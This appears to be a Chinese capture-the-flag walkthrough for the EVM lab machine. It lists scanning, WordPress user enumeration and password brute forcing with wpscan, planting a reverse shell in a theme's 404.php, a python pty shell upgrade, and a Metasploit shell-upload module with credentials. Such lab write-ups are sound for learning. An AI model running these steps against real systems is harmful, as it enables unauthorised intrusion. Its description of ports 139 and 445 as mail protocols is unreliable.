EVM靶机
网段扫描:arp-scan -l
扫描靶机开启的服务
开启的服务比较多,有ssh服务、有http服务;还有三个邮件协议110、139、445;
Ps:samba可以进行枚举 共享 enum4linux -S 192.168.56.103
遍历目录发现:info.php 并且还是wordpress框架
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ctKs2Lgp-1585305137800)(https://pic.downk.cc/item/5e6c8054e83c3a1e3a0fc35b.jpg)]
访问wordpress主页,这里有一个留言版,上面有一个用户[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gxHOyAbc-1585305137822)(https://pic.downk.cc/item/5e6c7fe4e83c3a1e3a0f9498.jpg)]
使用wpscan工具对wordpress尝试进行用户枚举;
发现一个用户,是上面发表留言的那个 c0rrupt3d_brain
wpscan --url http://192.168.56.103/wordpress --enumerate u
Ps:--random-user-agent 使用随机用户代理
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iFLXFMCS-1585305137829)(https://pic.downk.cc/item/5e6c8285e83c3a1e3a10d03a.jpg)]
找到了用户,用kali自带的字典跑一下看有没有弱口令
wpscan --url http://192.168.56.103/wordpress -U c0rrupt3d_brain -P /usr/share/wordlists/rockyou.txt
有了用户和密码,进行登录后台
Username: c0rrupt3d_brain, Password: 24992499
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kVPVoKUp-1585305137851)(https://pic.downk.cc/item/5e6c92abe83c3a1e3a1cc3f1.jpg)]
里面有一个主题插件 Appearance–Theme Editor里面有一个404.php的页面
在里面写入shell反弹连接
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Idvmkj96-1585305137860)(https://pic.downk.cc/item/5e6c9b49e83c3a1e3a226796.jpg)]
访问写入shell的页面,进行连接
默认这是存放主题插件代码的位置;
http://192.168.56.103/wordpress/wp-content/themes/twentynineteen
http://192.168.56.103/wordpress/wp-content/themes/twentynineteen/404.php
建立监听
切换到home目录下,有一个root3r的用户,
查看root3r下面的文件,没有权限
进行提权:使用python:
python -c “import pty;pty.spawn(’/bin/bash’)”
提权成功查看 .root_password_ssh.txt文件;
找到密码;su 进行切换到root,在root目录下找到proof.txt就成功了
第二
利用msfconsole 框架
use exploit/unix/webapp/wp_admin_shell_upload
set username admin Ps:用户名
set password TogieMYSQL12345^^ Ps:密码
set rhosts 192.168.56.129 Ps:目标地址
set targeturi wordpress Ps:网站url
利用msfconsole 框架
提权命令:python -c “import pty;pty.spawn(’/bin/bash’)”
在主题插件中的404.php写入shell反弹
在主题插件中的 functions.php中写入反弹